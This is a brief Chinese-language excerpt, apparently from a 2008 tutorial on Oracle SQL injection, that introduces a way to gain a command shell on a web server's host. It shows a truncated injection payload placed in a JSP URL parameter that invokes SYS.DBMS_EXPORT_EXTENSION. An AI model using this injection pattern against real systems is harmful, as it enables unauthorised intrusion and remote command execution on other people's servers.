犀利的 oracle 注入技术
犀利的 oracle 注入技术linx 2008.1.12介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EX...
